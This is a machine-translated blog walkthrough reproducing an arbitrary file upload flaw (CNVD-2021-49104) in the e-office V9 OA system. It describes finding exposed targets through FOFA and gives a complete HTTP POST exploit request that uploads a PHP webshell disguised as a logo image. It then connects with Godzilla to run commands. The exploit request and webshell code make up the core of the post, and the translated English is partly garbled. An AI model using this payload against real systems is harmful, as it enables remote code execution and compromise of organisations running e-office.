当前位置:网站首页>Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
2022-07-07 08:37:00 【It old culvert】
One 、 Preface
Due to the spread of 、 Any direct or indirect consequences and losses caused by using the information provided in this article , All by the user's own responsibility , The author of this article is not responsible for this .
The vulnerabilities in this article are all public vulnerability collection , If the vulnerability in the article appears, sensitive content has a partial impact , Please contact the author in time , Hope to understand .
Two 、 Loophole principle
This recurrence vulnerability is an undisclosed vulnerability CNVD-2021-49104, The vulnerability is due to e-office The user input part in the upload module was not properly handled , Attackers can construct malicious uploaded packets , Implement arbitrary code execution .
The following figure shows the code snippet related to the vulnerability
chart 1 Vulnerability code snippet
The location of the source code where the vulnerability exists , Mainly from uploadType The parameter is set to eoffice_logo when , There is no verification for the file , Cause arbitrary file upload .
DMS from “ Information ” Get relevant technical data
3、 ... and 、 Loophole recurrence actual combat
1. information gathering
FOFA Collection involves E-office Of Web Site
chart 2 FOFA information gathering
2. Select the recurrence target
With XX For example, website
chart 3 OA E-office Interface
3. structure POC
Burpsuite Carry out the bag , Repackage . The packet is constructed as
POC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: 127.0.0.1:7899 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Connection: close Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6 Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348 Content-Length: 193 Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 --e64bdf16c554bbc109cecef6451c26a4 Content-Disposition: form-data; name="Filedata"; filename="test.php" Content-Type: image/jpeg <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i
chart 4 Burpsuite Repackage
combination burp Response , Echo as file name , File uploaded successfully logo-eoffice.php.
4. Verify the vulnerability and getshell
After uploading , Access the following path http://???/images/logo/logo-eoffice.php
chart 5 Access file path
Use the tool Godzilla , Connect shell
chart 6 Godzilla getshell
To carry out an order , It can be executed normally , success getshell
chart 7 Command execution
【 Related technical documents 】
Four 、 summary
This article briefly introduces the vulnerability principle of the vulnerability and completes the practice of vulnerability recurrence .
边栏推荐
- Composer change domestic image
- 数据分片介绍
- All about PDF crack, a complete solution to meet all your PDF needs
- 单元测试报告成功率低
- 使用AGC重签名服务前后渠道号信息异常分析
- 基本数据类型和string类型互相转化
- The field value in Splunk subquery fuzzy matching CSV is*
- Give full play to the wide practicality of maker education space
- Several ways of lambda used in functions in kotlin (higher-order functions)
- Practice of implementing cloud native Devops based on rainbow library app
猜你喜欢
Rainbow combines neuvector to practice container safety management
登山小分队(dfs)
Obsidan之数学公式的输入
Rainbow 5.7.1 supports docking with multiple public clouds and clusters for abnormal alarms
路由信息协议——RIP
Data type - floating point (C language)
Splunk中single value视图使用将数值替换为文字
【无标题】
PVTV2--Pyramid Vision TransformerV2学习笔记
数据分析方法论与前人经验总结2【笔记干货】
随机推荐
How to understand distributed architecture and micro service architecture
AVL平衡二叉搜索树
Arm GIC (IV) GIC V3 register class analysis notes.
AVL balanced binary search tree
Xcit learning notes
rsync远程同步
Obsidan之数学公式的输入
Opencv learning notes II - basic image operations
23 Chengdu instrument customization undertaking_ Discussion on automatic wiring method of PCB in Protel DXP
Interpreting the practical application of maker thinking and mathematics curriculum
Opencv learning notes 1 -- several methods of reading images
Golan idea IntelliJ cannot input Chinese characters
Lua programming learning notes
Opencv learning note 5 - gradient calculation / edge detection
关于基于kangle和EP面板使用CDN
Iptables' state module (FTP service exercise)
IP guard helps energy enterprises improve terminal anti disclosure measures to protect the security of confidential information
The field value in Splunk subquery fuzzy matching CSV is*
Explore creativity in steam art design
Splunk中single value视图使用将数值替换为文字